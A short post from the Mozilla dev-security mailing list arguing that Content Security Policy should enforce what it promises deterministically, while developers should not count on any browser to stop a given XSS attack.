Lucas Adamski wrote: > Well, I think any security feature/model has to have some properties > that are reliable. So CSP may not prevent XSS is the blanket sense, but > it still needs to be able to enforce some set of restrictions that the > developer can rely upon.
Your second sentence doesn't follow from your first, in this context. Yes, if CSP promises it'll prevent exact attack scenario X, it should prevent X, and if it doesn't prevent X, it's a bug. (But all that's really saying is that it's deterministic.) No, that doesn't mean that developers should rely on a particular browser preventing attack X. There may be a bug, the user may have turned it off, there may be a very similar attack Y using the same flaw which CSP can't prevent, and so on. Gerv _______________________________________________ dev-security mailing list [email protected] https://lists.mozilla.org/listinfo/dev-security
